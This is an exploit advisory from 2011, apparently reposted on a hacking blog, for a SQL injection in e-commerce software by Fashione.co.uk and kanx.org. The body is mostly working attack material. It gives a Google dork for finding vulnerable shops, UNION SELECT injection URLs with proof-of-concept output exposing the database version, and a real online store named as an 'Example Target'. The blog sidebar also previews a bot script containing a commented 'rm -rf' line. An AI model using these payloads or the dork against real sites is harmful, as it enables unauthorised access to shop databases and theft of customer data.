################################################################
[+] Exploit Title: E-Commerce Fashione.co.uk & www.kanx.org [SQL Injection]
[+] Google Dork: "Powered by: Fashione.co.uk" or "Ecommerce Design by www.kanx.org"
[+] Date: November 10, 2011
[+] Author: D4wFl1N
[+] Contact : D4wFl1N[at]deadc0de[dot]or[dot]id
[+] Web : http://D4wFl1N.blogspot.com
[+] Software Link: http://www.fashione.co.uk/ | http://www.kanx.org/
[+] Category: web apps [SQL Injection]
[+] Tested on: [Windows XP]
#################################################################
[+] Vulnerability :
*SQL injection Vulnerability*
http://localhost/path/index.php?page_id=dept&id=1'
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,[deadc0de],9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://localhost/path/index.php?page_id=brand&brandid=1
http://localhost/path/index.php?page_id=brand&brandid=1&id=1&deptid=1
[+] POC
http://localhost/path/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 10 \ Page 1
Selected Column Count is 30
Valid String Column is 8 and 10
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 5.0.92-community 10 \ Page 1
http://localhost/path/index.php?page_id=dept&id=33&deptid=65+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
Result : 8 5.0.92-community \ Page 1
[+] Example Target
http://www.fusionfashion.co.uk/index.php
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1'
http://www.fusionfashion.co.uk/index.php?page_id=dept&id=1&deptid=1+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
################################################################################
[+] Greets : r3d3_deadc0de, Gwe_meonkzt, p4rcomx, th3-w1tch, Dr.Cr4sh, Oghie, vim-n4n0, Avant Levithan a.k.a Bokepers :D and you
deadc0de-Team, Makassar Ethical Hacker, xCrew,nyubicrew Mildnet, irc.byroe.net
################################################################################
skip to main |
skip to sidebar
Pages
Followers
Blog Archive
-
▼
2011
(87)
-
▼
November
(16)
- How to learn with Damn Vulnerable Web Application
- Python Basics
- Esthost Taken Down – Biggest Cybercriminal Takedow...
- Added value, security for BOV Internet banking cus...
- Gmail + Google Chrome XSS Vulnerability
- Google Analytics XSS Vulnerability
- HackTool:Win32/Sqlinject
- Bug XSS on Gmail and Google Analytics
- E-Commerce Fashione.co.uk & www.kanx.org [SQL Inje...
- Damn Small XSS Scanner (DSXS)
- Hijacking Google Analytics
- Metasploit db_autopwn Windows 8
- Backdoor:Win32/Mangzamel.A
- pybot.py <= python bot v0.1
- Bug site www.polri.go.id
- Freegate and GProxy Tools
-
▼
November
(16)
Powered by Blogger.
Partner Site
Entri Populer
-
Yesterday (or above) Microsoft made available "Windows 8 Developer Preview" for anyone to download. I hize installation in Virtual...
-
Code : ========================================================== #!/usr/bin/perl #system 'cd /tmp;rm -rf *'; # # Mizok Bot V3....
-
/* MySQL R7 - Example Account Script by: VincentDunn */ #include #include #include //----------------------------------------...
-
Source Lengkap bisa diambil di sini http://pastebin.com/vsnFhkyB
-
## # $Id: realwin_on_fc_binfile_a.rb 12975 2011-06-20 04:01:47Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be ...
Visitor
0 comments:
Post a Comment